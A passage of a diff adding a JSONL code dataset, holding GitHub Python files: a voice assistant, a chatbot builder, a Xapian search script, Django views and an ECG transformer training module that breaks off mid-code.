diff --git "a/5443.jsonl" "b/5443.jsonl" new file mode 100644--- /dev/null +++ "b/5443.jsonl" @@ -0,0 +1,758 @@ +{"seq_id":"41003597653","text":"import os\r\nimport webbrowser\r\nfrom datetime import datetime\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nimport wikipedia\r\nfrom googlesearch import search\r\nimport smtplib\r\nimport bluetooth\r\nimport pywifi\r\nimport time\r\nfrom pywifi import const\r\nimport speedtest\r\nimport pyautogui\r\nimport psutil\r\nimport randfacts\r\nimport packages\r\nimport sys\r\nimport browserhistory as bh\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport lxml\r\n#This is python text to speach.\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate',180)\r\n#you can change voice according to you by changing the number in voice[].\r\nengine.setProperty('voice', voices[3].id)\r\n\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\n\r\n#This is to define date and time.\r\ndef wish_me():\r\n now = datetime.now()\r\n hours = int(now.strftime(\"%H\"))\r\n minn = now.strftime(\"%M\")\r\n sec = now.strftime(\"%S\")\r\n\r\n if hours >= 0 and hours < 12 :\r\n speak(\"Good Moring sir\")\r\n elif hours >= 12 and hours < 18 :\r\n speak(\"Good afternoon sir\")\r\n elif hours >= 18 :\r\n speak(\"Good evening sir\")\r\n\r\n if hours >= 0 and hours < 12:\r\n speak(f\"its {hours} {minn} AM\")\r\n elif hours >= 12 and hours < 24 :\r\n speak(f\"its {hours} {minn} PM\")\r\nwake =\"wake up\"\r\n#defineing takeCommand fn. it will recognize user audio input.\r\ndef takeCommand():\r\n r = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n print(\"Listening...\")\r\n r.pause_threshold = 0.6\r\n audio = r.listen(source)\r\n try:\r\n print(\"Recognizing...\")\r\n query = r.recognize_google(audio, language='en-in')\r\n print(f\"user said:{query}\\n\")\r\n\r\n except Exception as e:\r\n # print(e)\r\n print(\"say that again please... OR cheak your internet \")\r\n return 'none'\r\n return query\r\ndef sendEmail(to, content):\r\n server = smtplib.SMTP('smtp.gmail.com', 587)\r\n server.ehlo()\r\n server.starttls()\r\n speak(\"I need you email and its password, sir enter them below\")\r\n send_to2 = input(\"Enter your Email:- \")\r\n word = (input(\"Enter your password:- \"))\r\n server.login(send_to2, word)\r\n server.sendmail(send_to2, to, content)\r\n server.close()\r\nif __name__ == '__main__':\r\n name = \"Tegveer Singh\"\r\n wish_me()\r\n speak(\"i am Veronica here.\")\r\n speak(\"please tell what can i do for you sir..\")\r\n speak(\"i am Listening...\")\r\n while True:\r\n query = takeCommand().lower()\r\n #You should change the links,URLsand file location according to you.\r\n if query.count(wake)>0:\r\n speak(\"yes sir i am online and waiting for your command\")\r\n while True:\r\n query = takeCommand().lower()\r\n if 'fact' in query:\r\n x = randfacts.getFact()\r\n print(x)\r\n speak(x)\r\n elif 'wikipedia' in query:\r\n speak('Searching Wikipedia..')\r\n query = query.replace(\"wikipedia\", \"\")\r\n results = wikipedia.summary(query, sentences=2)\r\n speak(\"According to Wikipedia\")\r\n speak(results)\r\n elif 'open youtube' in query:\r\n speak('opening youtube')\r\n webbrowser.open(\"youtube.com\")\r\n elif 'search' in query:\r\n speak('sir, what should i search')\r\n cm = takeCommand().lower()\r\n speak('heres what i found')\r\n webbrowser.open(f\"{cm}\")\r\n elif 'link' in query:\r\n speak('What do you want to search..')\r\n query = takeCommand().lower()\r\n speak('Searching google..')\r\n speak('I found 5 results')\r\n for i in search(query, tld=\"com\", num=5, stop=5, pause=2):\r\n print(i)\r\n speak(i)\r\n elif 'open drive' in query:\r\n speak('opening your drive')\r\n webbrowser.open(\"https://drive.google.com/drive/u/1/my-drive\")\r\n elif 'news' in query:\r\n Webpage = requests.get(\"https://timesofindia.indiatimes.com/india/timestopten.cms\")\r\n\r\n kab = BeautifulSoup(Webpage.content, \"lxml\")\r\n content = kab.find_all('a', class_=\"news_title\")\r\n #print(content)\r\n\r\n for row in content: # Print all occurrences\r\n print(row.get_text())\r\n speak(row.get_text())\r\n\r\n elif 'temperature' in query:\r\n\r\n Webpage = requests.get(\"https://hi.weather.town/en/forecast/india/state-of-chhattisgarh/dongargarh/\")\r\n\r\n kab = BeautifulSoup(Webpage.content, \"lxml\")\r\n Temp = kab.find('div', class_=\"temp\").text\r\n print(f\"Current Temperature is {Temp}\")\r\n speak(f\"Current Temperature is {Temp}\")\r\n TempMor = kab.find('div', class_=\"temperature\", id=\"infTempMorning\").text\r\n print(f\"Morning Temperature is{TempMor}\")\r\n speak(f\"Morning Temperature is{TempMor}\")\r\n TempNight = kab.find('div', class_=\"temperature\", id=\"infTempNight\").text\r\n print(f\"Night Temperature is{TempNight}\")\r\n speak(f\"Night Temperature is{TempNight}\") \r\n elif 'time' in query:\r\n speak(\"yes sir\")\r\n now = datetime.now()\r\n hours = int(now.strftime(\"%H\"))\r\n minn = now.strftime(\"%M\")\r\n sec = now.strftime(\"%S\")\r\n\r\n if hours >= 0 and hours < 12:\r\n speak(f\"its {hours} {minn} AM\")\r\n elif hours >= 12 and hours < 24 :\r\n speak(f\"its {hours} {minn} PM\")\r\n else :\r\n speak(\"sorry sir i am not able to tell it now.\")\r\n elif 'battery' in query:\r\n speak('checking battery status')\r\n battery = psutil.sensors_battery()\r\n battery_per = battery.percent\r\n speak(f\"your battery is {battery_per} percent charged\")\r\n if battery_per <= 50:\r\n speak(f\"your battery percent is {battery_per}. it is low plese plug in charger\")\r\n elif 'internet speed' in query:\r\n speak(\"testing internet speed\")\r\n st = speedtest.Speedtest()\r\n dl = st.download()\r\n up = st.upload()\r\n dl2 = dl * 0.000001\r\n up2 = up * 0.000001\r\n speak(f\"sir we have {dl2} mb per second downloading speed and {up2} mb per second upload ing speed\")\r\n elif 'open my channel' in query:\r\n speak('opening your channel')\r\n webbrowser.open(\"https://www.youtube.com/channel/UCXeDwy9_kgTjo3tyFY9E7Tw?view_as=subscriber\")\r\n elif 'open chess' in query:\r\n speak('opening chess')\r\n webbrowser.open(\"https://www.youtube.com/channel/UCeg7zY285sTls-uyzBDLfYw\")\r\n elif 'open google' in query:\r\n speak('opening google')\r\n webbrowser.open(\"google.com\")\r\n elif 'who created you veronica' in query:\r\n speak(\"Tegveer singh had created me. he is my god\")\r\n elif 'bluetooth' in query:\r\n speak(\"yes sir searching bluetooth\")\r\n nearby_devices = bluetooth.discover_devices(lookup_names=True)\r\n print(\"Found {} devices.\".format(len(nearby_devices)))\r\n speak(\"Found {} devices nearby\".format(len(nearby_devices)))\r\n if nearby_devices == []:\r\n speak(\"sir please check weather your bluetooth is on or not.\")\r\n speak(\"here are the devices what i found\")\r\n for addr, name in nearby_devices:\r\n print(\"{}\".format(name))\r\n speak(\"{}\".format(name))\r\n elif 'wi-fi' in query:\r\n speak(\"yes sir searching wifi\")\r\n wifi = pywifi.PyWiFi()\r\n\r\n Iface = wifi.interfaces()[0]\r\n name = Iface.name()\r\n Iface.scan()\r\n time.sleep(1)\r\n\r\n results = Iface.scan_results()\r\n for data in results:\r\n print(data.ssid)\r\n speak(data.ssid)\r\n elif \"what's my name\" in query:\r\n speak(name)\r\n ans = takeCommand().lower()\r\n if \"no\" in ans:\r\n speak(\"oh! sorry sir whats your name tell me i will remember it for future\")\r\n name = takeCommand().lower()\r\n else:\r\n speak(\"Something went wrong\")\r\n elif 'what can you do for me' in query:\r\n speak(\"Hii sir i can write Emails and send them, i can search on google, play music, dont worry if you got bored i can even play moives for you and many more\")\r\n elif 'good' in query:\r\n speak(\"Thank you sir,its my pleasure. any thing else\")\r\n elif 'volume up' in query:\r\n pyautogui.press(\"volumeup\")\r\n speak(\"volume is increased by two units\")\r\n elif 'volume down' in query:\r\n pyautogui.press(\"volumedown\")\r\n speak(\"volume is decreased by two units\")\r\n elif 'mute' in query:\r\n pyautogui.press(\"volumemute\")\r\n print(\"volume is muted.\")\r\n elif 'screenshot' in query:\r\n speak(\"sir please tell me the name of this screenshot file\")\r\n h = takeCommand().lower()\r\n speak(\"sir please hold the screen for few second, i am taking screenshot\")\r\n img = pyautogui.screenshot()\r\n img.save(f'{h}.png')\r\n speak(\" I am done with screenshot, i am ready for next command\")\r\n elif 'play music' in query:\r\n speak('playing music')\r\n from playsound import playsound\r\n playsound('E:/VIDEO & MP3&WALLPAPER/A.R.RAHMAN/TU HI RE')\r\n elif 'open vs code' in query:\r\n speak('opening v s code')\r\n codePath = \"C:\\\\Users\\\\DELL\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\"\r\n os.startfile(codePath)\r\n elif 'open blender' in query:\r\n speak('opening blender')\r\n codePath = \"C:\\\\Program Files\\\\Blender Foundation\\\\Blender 2.91\\\\blender.exe\"\r\n os.startfile(codePath)\r\n elif 'movie' in query:\r\n speak('let me show you some movie sir')\r\n codePath = \"E:\\VIDEO & MP3&WALLPAPER\\Video full hd\\Mere Wala Sardar (Full Song) _ Jugraj Sandhu _ New Song 2018 _ New Punjabi Songs 2018\"\r\n os.startfile(codePath)\r\n elif 'send email' in query:\r\n speak(\"Sir enter below To whom do you want to send Email \")\r\n send_to = input(\"To whom do you want to send Email:- \")\r\n try:\r\n speak('What should I say')\r\n content = takeCommand()\r\n to = send_to\r\n sendEmail(to, content)\r\n speak(\"Email has been sent!\")\r\n except Exception as e:\r\n print(e)\r\n speak(\"Sorry sir i am not able to sent Email right now.\")\r\n elif 'sleep' in query:\r\n speak(\"ok sir i am going to sleep,call me for anything else.\")\r\n break\r\n elif \"sleep\" in query:\r\n speak(\"ok veronica is terminating\")\r\n sys.exit()","repo_name":"tegveer1313/veronika","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"36177471339","text":"import os\n\nfrom app.chatbot import Chatbot\nfrom app.components.embeddings.abstract.embeddings import Embeddings\nfrom app.components.language_models.abstract.language_model import LanguageModel\nfrom app.components.vectorstores.abstract.vectorStore import VectorStore\nfrom app.utils.collections.embeddings_collection import EmbeddingsCollection\nfrom app.utils.collections.language_model_collection import LanguageModelCollection\nfrom app.utils.collections.vectorstore_collection import VectorStoreCollection\nfrom app.utils.config_utils import ConfigUtils\n\n\nclass ChatbotBuilder:\n EMBEDDINGS_KEY = 'embeddings'\n VECTORSTORE_KEY = 'vectorstore'\n LANGUAGE_MODEL_KEY = 'language_model'\n\n def __init__(self, config_path: str):\n self.config_path = config_path\n self.config = ConfigUtils.load_config(config_path)\n\n def build(self) -> Chatbot:\n embeddings = self.create_embeddings()\n vectorstore = self.create_vectorstore(embeddings)\n language_model = self.create_language_model()\n return Chatbot(language_model, vectorstore)\n\n def create_embeddings(self) -> Embeddings:\n embeddings_strategy = self.config[self.EMBEDDINGS_KEY]['strategy']\n embeddings_class = EmbeddingsCollection().get_embeddings_class(embeddings_strategy)\n return embeddings_class(model_name=self.config[self.EMBEDDINGS_KEY]['model_name'])\n\n def create_vectorstore(self, embeddings: Embeddings) -> VectorStore:\n vectorstore_config = self.config[self.VECTORSTORE_KEY]\n\n local_path = os.getcwd() + '/' + vectorstore_config.get('local_path')\n if local_path is not None and os.path.isdir(local_path):\n save = False\n path = local_path\n strategy = vectorstore_config.get('local_strategy')\n else:\n save = True\n path = vectorstore_config.get('pdf_path')\n strategy = vectorstore_config.get('pdf_strategy')\n\n vectorstore_class = VectorStoreCollection().get_vectorstore(strategy)\n vectorstore = vectorstore_class(path=path, embeddings=embeddings.get_embedding())\n\n if save:\n local_vectorstore_dir = ConfigUtils.get_filename(vectorstore_config.get('pdf_path'))\n vectorstore_type = vectorstore_config.get('type')\n save_path = os.path.join(\n os.getcwd(),\n 'docs',\n 'vectorstores',\n vectorstore_type,\n local_vectorstore_dir\n )\n vectorstore.save(save_path)\n\n local_path = os.path.join(\n 'docs',\n 'vectorstores',\n vectorstore_type,\n local_vectorstore_dir\n )\n self.config[self.VECTORSTORE_KEY]['local_path'] = local_path\n self.config[self.VECTORSTORE_KEY]['local_strategy'] = 'FaissLoadLocalStrategy'\n ConfigUtils.write_config(config_path=self.config_path, config_data=self.config)\n\n return vectorstore\n\n def create_language_model(self) -> LanguageModel:\n language_model_strategy = self.config[self.LANGUAGE_MODEL_KEY]['strategy']\n language_model_class = LanguageModelCollection().get_language_model_class(language_model_strategy)\n return language_model_class(model_name=self.config[self.LANGUAGE_MODEL_KEY]['model_name'])\n","repo_name":"Quitzchell/chatbot-sandbox","sub_path":"app/builders/chatbot_builder.py","file_name":"chatbot_builder.py","file_ext":"py","file_size_in_byte":3338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16895368590","text":"#!/usr/bin/env python3\nfrom bs4 import BeautifulSoup\nimport json\nimport sys\nimport xapian\nimport os\nfrom nltk.corpus import stopwords # nltk para stopwords e stemming\nimport csv\n\nstop_es = stopwords.words('spanish')\n\nos.chdir('/home/felipe/Documents/IR')\n\ndbpath = \"./db4\"\n\noffset = 0 # Inicia o conjunto de resultados no primeiro valor\npagesize = 100 # Número de itens a serem retornados\n\n\n\n# Abre o banco de dados\ndb = xapian.Database(dbpath)\n\n# Cria o parser das queries e coloca o stemmer pra espanhol\nqueryparser = xapian.QueryParser()\nqueryparser.set_stemmer(xapian.Stem(\"es\"))\n\nqueryparser.set_stemming_strategy(queryparser.STEM_ALL_Z)\ndoccount = 0\n\n#inclui stopwords\nstopper = xapian.SimpleStopper()\n\nfor word in stop_es:\n stopper.add(word)\n\nqueryparser.set_stopper(stopper)\n\n\nquery_title = 'Conferencia de la Mujer en Pekín'\nquery_text = 'Las posiciones controvertidas adoptadas por algunos delegados hicieron que la Conferencia mundial de la Mujer en Pekín se expusiese al fracaso.'\n\n# Faz parse na consulta\nquery = queryparser.parse_query(query_title + '\\n' + query_text)\n\n# Roda a busca\nenquire = xapian.Enquire(db)\nenquire.set_query(query)\n\nmatches = []\nscor=[]\nfor match in enquire.get_mset(offset, pagesize):\n fields = json.loads(match.document.get_data().decode('utf-8'))\n matches.append(fields)\n\nmyfile = open('testeb.csv', 'w')\nwr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\nwr.writerow(matches)\nmyfile.close()","repo_name":"soares-f/IR_assignment","sub_path":"tests_search.py","file_name":"tests_search.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74263112683","text":"from django.shortcuts import redirect, render\nfrom .models import Book, Author\nfrom .forms import BookForm, BookFormSet\n\n# Create your views here.\n\n\ndef create_book(request, pk):\n author = Author.objects.get(id=pk)\n formset = BookFormSet(request.POST or None)\n\n if request.method == \"POST\":\n if formset.is_valid():\n formset.instance = author\n formset.save()\n return redirect('book:create-book', pk=author.id)\n\n context = {\"formset\": formset, 'author': author}\n\n return render(request, \"books\\create_book.html\", context)\n\ndef create_book_form(request):\n bookForm =BookForm(request.POST or None)\n context = {\"form\": bookForm}\n return render(request, \"books\\create_book_form.html\", context)\n\n","repo_name":"danhdeng/django-dynamic-htmx","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71737957483","text":"import os\nimport sys\nimport math\nimport logging\nimport datetime\nfrom typing import Dict, Tuple, Union, Any\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom torch.utils.tensorboard import SummaryWriter\nimport pytorch_lightning as pl\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom transformers import get_cosine_schedule_with_warmup, get_constant_schedule_with_warmup\nfrom tqdm import tqdm\n\nfrom ecg_transformer.util import *\nimport ecg_transformer.util.train as train_util\nfrom ecg_transformer.preprocess import EcgDataset, transform, PtbxlDataModule, get_ptbxl_splits, get_ptbxl_dataset\nfrom ecg_transformer.models.ecg_vit import EcgVitConfig, EcgVit\n\n\nclass EcgVitTrainModule(pl.LightningModule):\n def __init__(self, model: nn.Module, train_args: Dict = None, parent_trainer: 'MyPlTrainer' = None):\n super().__init__()\n self.model = model\n self.train_args, self.parent_trainer = train_args, parent_trainer\n\n def forward(self, **kwargs):\n return self.model(**kwargs)\n\n def configure_optimizers(self):\n optim, sch = self.train_args['optimizer'], self.train_args['schedule']\n optim_cls = torch.optim.AdamW if optim == 'AdamW' else torch.optim.Adam\n lr, dc = self.train_args['learning_rate'], self.train_args['weight_decay']\n optimizer = optim_cls(self.parameters(), lr=lr, weight_decay=dc)\n warmup_ratio, n_step = self.train_args['warmup_ratio'], self.train_args['n_step']\n ch_args = dict(optimizer=optimizer, num_warmup_steps=round(n_step*warmup_ratio))\n if sch == 'constant':\n sch = get_constant_schedule_with_warmup\n else:\n sch = get_cosine_schedule_with_warmup\n ch_args.update(dict(num_training_steps=n_step))\n scheduler = sch(**ch_args)\n return [optimizer], [dict(scheduler=scheduler, interval='step', frequency=1)]\n\n def training_step(self, batch, batch_idx):\n loss, logits = self(**batch)\n return dict(loss=loss, logits=logits.detach(), labels=batch['labels'].detach())\n\n def validation_step(self, batch, batch_idx):\n loss, logits = self(**batch)\n return dict(loss=loss, logits=logits.detach(), labels=batch['labels'].detach())\n\n def training_step_end(self, step_output):\n loss, logits, labels = step_output['loss'], step_output['logits'], step_output['labels']\n d_log = dict(epoch=self.current_epoch+1, step=self.global_step+1) # 1-indexed\n lr = self.parent_trainer.get_curr_learning_rate()\n d_update = { # colab compatibility\n **dict(learning_rate=lr, loss=loss.detach().item()),\n **train_util.get_accuracy(torch.sigmoid(logits), labels, return_auc=True)\n }\n d_log.update({f'train/{k}': v for k, v in d_update.items()})\n self._log_info(d_log)\n\n def validation_epoch_end(self, outputs):\n loss = np.array([d['loss'].detach().item() for d in outputs]).mean()\n logits, labels = torch.cat([d['logits'] for d in outputs]), torch.cat([d['labels'] for d in outputs])\n preds_prob = torch.sigmoid(logits)\n d_log = dict(epoch=self.current_epoch+1, step=self.global_step+1)\n d_update = {**dict(loss=loss), **train_util.get_accuracy(preds_prob, labels)}\n for k, v in d_update.items():\n if not isinstance(v, dict):\n self.parent_trainer.pl_trainer.callback_metrics[k] = torch.tensor(v) # per `ModelCheckpoint`\n d_log.update({f'eval/{k}': v for k, v in d_update.items()})\n self._log_info(d_log)\n\n def _log_info(self, x):\n if self.parent_trainer is not None:\n self.parent_trainer.log(x)\n\n\nclass MyPlTrainer:\n \"\"\"\n Seems to be some problem with either the PL library or my implementation,\n that the logits for all inputs are all the same\n => Deprecated, see `MyTrainer`, where I don't observe the problem with my own training loop\n \"\"\"\n def __init__(\n self, name='EcgVit Train', model: nn.Module = None,\n data_module: PtbxlDataModule = None, train_args: Dict = None\n ):\n self.name = name\n self.save_time = now(for_path=True)\n self.train_args = train_args\n self.output_dir = self.train_args['output_dir'] = os.path.join(PATH_BASE, DIR_PROJ, DIR_MDL, self.save_time)\n learning_rate, weight_decay, train_batch_size, num_train_epoch, n_step = (self.train_args[k] for k in (\n 'learning_rate', 'weight_decay', 'train_batch_size', 'num_train_epoch', 'n_step'\n ))\n self.model, self.data_module = model, data_module\n self.pl_module = EcgVitTrainModule(model=model, train_args=train_args, parent_trainer=self)\n model_meta = model.meta\n self.train_meta = {'model': model_meta, '#epoch': num_train_epoch, '#step': n_step, 'bsz': train_batch_size}\n self.log_fnm = f'{model_meta[\"name\"]}, ' \\\n f'n={len(data_module.dset_tr)}, a={learning_rate}, dc={weight_decay}, ' \\\n f'bsz={train_batch_size}, n_ep={num_train_epoch}'\n self.logger, self.logger_fl, self.logger_tb, self.pl_trainer = None, None, None, None\n # cos the internal epoch for sanity check eval is always 0\n self._ran_sanity_check_eval, self._eval_epoch_count = False, 1\n\n def train(self):\n n_ep = self.train_args['num_train_epoch']\n self.logger: logging.Logger = get_logger(self.name)\n self.logger_fl = get_logger(\n name=self.name, typ='file-write', file_path=os.path.join(self.output_dir, f'{self.log_fnm}.log')\n )\n self.logger.info(f'Launched training model {logi(self.model.config)} '\n f'with args {log_dict_pg(self.train_args)} and {log_dict(self.train_meta)}... ')\n self.logger_fl.info(f'Launched training model {self.model.config} '\n f'with args {log_dict_id(self.train_args)} and {log_dict_nc(self.train_meta)}... ')\n tb_fnm = f'tb - {self.log_fnm}'\n os.makedirs(os.path.join(self.output_dir, tb_fnm), exist_ok=True)\n self.logger_tb = TensorBoardLogger(self.output_dir, name=tb_fnm)\n callbacks = []\n if self.train_args['save_every_n_epoch']:\n callbacks.append(pl.callbacks.ModelCheckpoint(\n dirpath=os.path.join(self.output_dir, 'checkpoints'),\n monitor='loss', # having `eval/loss` seems to break the filename\n filename='checkpoint-{epoch:02d}, {loss:.2f}',\n every_n_epochs=self.train_args['save_every_n_epoch'],\n save_top_k=self.train_args['save_top_k'],\n save_last=True\n ))\n if self.train_args['tqdm']:\n callbacks.append(train_util.MyProgressBar())\n self.pl_trainer = pl.Trainer(\n logger=self.logger_tb,\n default_root_dir=self.output_dir,\n enable_progress_bar=self.train_args['tqdm'],\n callbacks=callbacks,\n gradient_clip_val=1,\n check_val_every_n_epoch=1 if self.train_args['do_eval'] else int(1e10),\n max_epochs=n_ep,\n log_every_n_steps=1,\n gpus=torch.cuda.device_count(),\n accelerator='auto',\n precision=self.train_args['precision'],\n num_sanity_val_steps=-1, # Runs & logs eval before training starts\n deterministic=True,\n detect_anomaly=True,\n move_metrics_to_cpu=True,\n )\n t_strt = datetime.datetime.now()\n self.pl_trainer.fit(self.pl_module, self.data_module)\n t = fmt_time(datetime.datetime.now() - t_strt)\n self.logger.info(f'Training completed in {logi(t)} ')\n self.logger_fl.info(f'Training completed in {t} ')\n\n def get_curr_learning_rate(self):\n assert self.pl_trainer is not None\n return self.pl_trainer.lr_scheduler_configs[0].scheduler.get_last_lr()[0]\n\n def log(self, msg):\n is_dict = isinstance(msg, dict)\n assert is_dict\n is_eval = not any('learning_rate' in k for k in msg.keys()) # heuristics to detect eval\n if is_eval:\n step = n_ep = msg['epoch']\n assert n_ep == self._eval_epoch_count\n if not self._ran_sanity_check_eval:\n self._ran_sanity_check_eval = True\n n_ep -= 1 # effectively, eval epoch is 0-indexed, unlike train logging\n self._eval_epoch_count -= 1\n self._eval_epoch_count += 1\n msg['epoch'] = self._eval_epoch_count-1\n del msg['step']\n else:\n step = msg['step']\n msg_ = train_util.pretty_log_dict(msg, ref=self.train_meta) if is_dict else msg\n should_log = True\n if self.train_args['log_per_epoch'] and not is_eval and msg['step'] % self.train_args['steps_per_epoch'] != 0:\n should_log = False\n if self.logger is not None and self.train_args['log_to_console'] and should_log:\n self.logger.info(log_dict(msg_) if is_dict else msg_)\n if self.logger_fl is not None:\n self.logger_fl.info(log_dict_nc(msg_) if is_dict else msg_)\n if self.logger_tb is not None and is_dict:\n if 'step' in msg:\n del msg['step']\n msg = {k: v for k, v in msg.items() if ('per_class_auc' not in k and 'epoch' not in k and bool(v))}\n self.logger_tb.log_metrics(msg, step=step)\n\n\nclass MyTrainer:\n \"\"\"\n My own training loop, fp16 not supported\n But it's faster than PL, even for CUDA without fp16\n \"\"\"\n tb_ignore_keys = ['step', 'epoch', 'per_class_auc']\n\n def __init__(\n self, name='EcgVit', model: EcgVit = None,\n train_dataset: EcgDataset = None, eval_dataset: EcgDataset = None, args: Dict = None\n ):\n self.name = name\n self.save_time = now(for_path=True)\n self.args = {**get_train_args(), **(args or dict())}\n self.output_dir = self.args['output_dir'] = os.path.join(PATH_BASE, DIR_PROJ, DIR_MDL, self.save_time)\n learning_rate, weight_decay, train_batch_size, num_train_epoch, n_step = (self.args[k] for k in (\n 'learning_rate', 'weight_decay', 'train_batch_size', 'num_train_epoch', 'n_step'\n ))\n\n self.model, self.train_dataset, self.eval_dataset = model, train_dataset, eval_dataset\n self.optimizer, self.scheduler = None, None\n self.epoch, self.step = None, None\n\n to = self.args['augment_timeout']\n self.train_meta = {\n 'model': model.meta, '#epoch': num_train_epoch, '#step': n_step, 'bsz': train_batch_size, 'timeout': to\n }\n self.log_fnm = f'model={model.meta_str}, ' \\\n f'n={(train_dataset and len(train_dataset)) or \"NA\"}, a={learning_rate}, dc={weight_decay}, ' \\\n f'bsz={train_batch_size}, n_ep={num_train_epoch}, to={to}'\n self.logger, self.logger_fl, self.tb_writer = None, None, None\n\n def train(self):\n name = f'{self.name} Train'\n self.logger = get_logger(name)\n log_path = os.path.join(self.output_dir, f'{self.log_fnm}.log')\n self.logger_fl = get_logger(name=name, typ='file-write', file_path=log_path)\n self.logger.info(f'Launched training model {logi(self.model.config)} '\n f'with args {log_dict_pg(self.args)} and {log_dict(self.train_meta)}... ')\n self.logger_fl.info(f'Launched training model {self.model.config} '\n f'with args {log_dict_id(self.args)} and {log_dict_nc(self.train_meta)}... ')\n tb_fnm = f'tb - {self.log_fnm}'\n tb_path = os.path.join(self.output_dir, tb_fnm)\n os.makedirs(tb_path, exist_ok=True)\n self.tb_writer = SummaryWriter(tb_path)\n\n dl = DataLoader(self.train_dataset, batch_size=self.args['train_batch_size'], shuffle=True, pin_memory=True)\n optim_cls = torch.optim.AdamW if self.args['optimizer'] == 'AdamW' else torch.optim.Adam\n lr, dc = self.args['learning_rate'], self.args['weight_decay']\n self.optimizer = optim_cls(self.model.parameters(), lr=lr, weight_decay=dc)\n warmup_ratio, n_step = self.args['warmup_ratio'], self.args['n_step']\n sch, args = self.args['schedule'], dict(optimizer=self.optimizer, num_warmup_steps=round(n_step*warmup_ratio))\n if sch == 'constant':\n sch = get_constant_schedule_with_warmup\n else:\n sch = get_cosine_schedule_with_warmup\n args.update(dict(num_training_steps=n_step))\n self.scheduler = sch(**args)\n\n if torch.cuda.is_available():\n self.model.cuda()\n\n self.epoch, self.step = 0, 0\n best_eval_loss, n_bad_ep = float('inf'), 0\n t_strt = datetime.datetime.now()\n if self.args['do_eval']:\n self.model.train() # to pass assertion, see below\n self.evaluate()\n for _ in range(self.args['num_train_epoch']):\n self.epoch += 1\n self.model.train() # cos at the end of each eval, evaluate\n desc_epoch = self._get_epoch_desc()\n with tqdm(dl, desc=f'Train {desc_epoch}', unit='ba') as t_dl:\n for inputs in t_dl:\n # TODO: set_postfix\n self.step += 1\n self.optimizer.zero_grad()\n\n if torch.cuda.is_available():\n inputs = {k: v.cuda() for k, v in inputs.items()}\n outputs = self.model(**inputs)\n loss, logits = outputs.loss, outputs.logits.detach()\n labels = inputs['labels'].detach()\n loss_scalar = loss.detach().item()\n\n loss.backward()\n nn.utils.clip_grad_norm_(self.model.parameters(), max_norm=1.0, error_if_nonfinite=True)\n self.optimizer.step()\n self.scheduler.step()\n\n d_log = dict(epoch=self.epoch, step=self.step) # 1-indexed\n lr = self._get_lr()\n d_update = { # colab compatibility\n **dict(learning_rate=lr, loss=loss_scalar),\n **train_util.get_accuracy(torch.sigmoid(logits), labels, return_auc=True)\n }\n pretty_loss = train_util.pretty_single('loss', loss_scalar)\n pretty_auc = train_util.pretty_single('auc', d_update['macro_auc'])\n t_dl.set_postfix(loss=pretty_loss, macro_auc=pretty_auc)\n d_log.update({f'train/{k}': v for k, v in d_update.items()})\n self.log(d_log)\n\n save_n_ep = self.args['save_every_n_epoch']\n if save_n_ep and self.epoch > 0 and self.epoch % save_n_ep == 0:\n fnm = f'model - {self.log_fnm}, ep{self.epoch}.pt'\n torch.save(self.model.state_dict(), os.path.join(self.output_dir, fnm))\n if self.args['do_eval']:\n eval_loss = self.evaluate()['eval/loss']\n\n if eval_loss < best_eval_loss:\n best_eval_loss = eval_loss\n n_bad_ep = 0\n else:\n n_bad_ep += 1\n if n_bad_ep >= self.args['patience']:\n t = fmt_time(datetime.datetime.now() - t_strt)\n d_pat = dict(epoch=self.epoch, patience=self.args['patience'], best_eval_loss=best_eval_loss)\n self.logger.info(f'Training terminated early for {log_dict(d_pat)} in {logi(t)} ')\n self.logger_fl.info(f'Training terminated early for {log_dict_nc(d_pat)} in {t}')\n break\n t = fmt_time(datetime.datetime.now() - t_strt)\n self.logger.info(f'Training completed in {logi(t)} ')\n self.logger_fl.info(f'Training completed in {t} ')\n self.logger, self.logger_fl, self.tb_writer = None, None, None # reset\n torch.save(self.model.state_dict(), os.path.join(self.output_dir, f'model - {self.log_fnm}.pt'))\n\n def evaluate(\n self, eval_dataset: EcgDataset = None, return_predictions: bool = False, loss_reduction: str = 'mean',\n ) -> Union[Dict[str, Any]]:\n \"\"\"\n :param eval_dataset: Eval dataset\n :param return_predictions: if True, return predictions & labels along with metrics\n :param loss_reduction:\n If 'mean', loss is averaged across all batches\n If 'none', loss is averaged for each sample and a tensor of length len(eval_dataset) is returned\n \"\"\"\n ca.check_mismatch('Eval Loss Reduction', loss_reduction, ['mean', 'none'])\n red_ori = self.model.loss_reduction\n self.model.loss_reduction = loss_reduction\n reduce = loss_reduction == 'mean'\n bsz = self.args['eval_batch_size']\n vl = eval_dataset or self.eval_dataset\n dl = DataLoader(vl, batch_size=bsz, shuffle=False)\n\n lst_loss, lst_logits, lst_labels = [], [], []\n training = self.model.training\n if not training: # no tqdm for eval if during training\n dl = tqdm(dl, desc='Evaluating... ')\n assert self.logger is None\n self.logger = get_logger(f'{self.name} Eval')\n self.model.eval()\n for inputs in dl:\n if torch.cuda.is_available():\n inputs = {k: v.cuda() for k, v in inputs.items()}\n with torch.no_grad():\n output = self.model(**inputs)\n loss = output.loss.detach().cpu()\n if reduce:\n loss_log = loss = loss.item()\n else:\n loss = loss.mean(dim=-1)\n loss_log = loss.mean().item()\n lst_loss.append(loss)\n lst_logits.append(output.logits.detach().cpu())\n lst_labels.append(inputs['labels'].cpu())\n if not training:\n 